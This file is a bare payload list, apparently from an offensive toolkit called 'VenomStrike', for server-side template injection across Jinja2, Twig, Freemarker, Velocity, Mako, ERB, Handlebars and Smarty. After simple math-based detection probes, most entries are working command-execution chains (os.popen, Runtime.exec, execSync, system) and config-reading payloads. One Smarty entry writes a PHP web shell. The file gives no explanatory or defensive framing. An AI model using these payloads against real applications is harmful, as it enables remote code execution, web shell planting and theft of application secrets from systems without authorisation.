# VenomStrike SSTI Payloads
# Math-based detection
{{7*7}}
${7*7}
#{7*7}
<%= 7*7 %>
{{7*'7'}}
${{7*7}}
{7*7}
#{7*7}
*{7*7}

# Jinja2 / Python
{{config}}
{{config.items()}}
{{self.__init__.__globals__.__builtins__}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__init__.__globals__['current_app'].config}}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

# Twig / PHP
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# Freemarker / Java
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
${object.getClass().forName("java.lang.Runtime").getRuntime().exec("id")}

# Velocity
#set($str=$class.inspect("java.lang.String").type)
#set($rt=$str.getClass().forName("java.lang.Runtime").getRuntime())

# Pebble
{% set cmd = 'id' %}

# Mako
${self.module.cache.util.os.popen("id").read()}

# ERB / Ruby
<%= 7*7 %>
<%= system("id") %>
<%= `id` %>

# Handlebars
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('id');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

# Smarty
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}